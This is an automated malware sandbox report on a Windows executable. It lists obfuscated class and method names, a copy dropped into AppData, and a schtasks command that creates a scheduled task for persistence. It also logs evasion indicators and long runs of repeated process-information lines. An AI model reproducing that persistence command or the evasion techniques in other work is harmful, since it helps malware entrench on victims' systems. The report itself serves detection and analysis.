                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, evS9AWG2CNFAym7a5B.cs | High entropy of concatenated method names: 'm7WS4YWvZm', 'oZuS3Jtcox', 'EyfSXdQrqS', 'CAsSfqATkp', 'CmJSvbkqPN', 'RjUSFpEMj0', 'PLtSKOPJ6I', 'FqRSusjVXU', 'jkYSePUCJi', 'qAFSwn3byb'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, XYunMcMDEnm3SAa2GP.cs | High entropy of concatenated method names: 'gpFJpfDDto', 'GrxJxBeiCO', 'GlTJhN9dLR', 'WMqhbfnCqm', 'vSThzcOpSK', 'MZrJnr1IYP', 'YeOJmiZWns', 'GunJaxVc3m', 'j4xJEU1WMv', 'FJ4JVUj0eE'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, echjWQq01X6VgL2i2E.cs | High entropy of concatenated method names: 'qjIh2VW2wi', 'xFLhopYTN5', 'W7ghQIcFE2', 'DAThJE48f5', 'GaGhNwUdjI', 'BH8QBo9ETq', 'nUdQY56ldk', 'G0sQZHUmdg', 'x0eQtwN7CN', 'bDFQCsHjvp'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, FxU4CYOsPLOiGq2XV5P.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r3YcW06yAT', 'GVVc7xaQye', 'zkDclMLk4c', 'hSDc08h6Yh', 'FNacBZLkfg', 'jvXcYJVSZa', 'ooKcZMewLF'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, vnZumw0lDysfkiJ3bL.cs | High entropy of concatenated method names: 'RmhP48cjw', 'm6nsgtjoL', 'O3hLCOVNG', 'Ke4y8wlK2', 'nOP3yRJjs', 'dQIjrNZ5I', 'cbHaOSWjOQEea5IDLa', 'LS8604qNCXFUjNSWbi', 'VTZ5AHAfo', 'w8tcfrLTy'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, NkEtj4xdihRGcDPjVY.cs | High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File created: C:\Users\user\AppData\Roaming\GDhinOc.exe

                Boot Survival

                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: nK1Y86mbzfbkwpB.exe PID: 5040, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: GDhinOc.exe PID: 6420, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\runas.exe; API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: C10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 27B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 47B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 75A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 70E0000 memory reserve | memory write watch
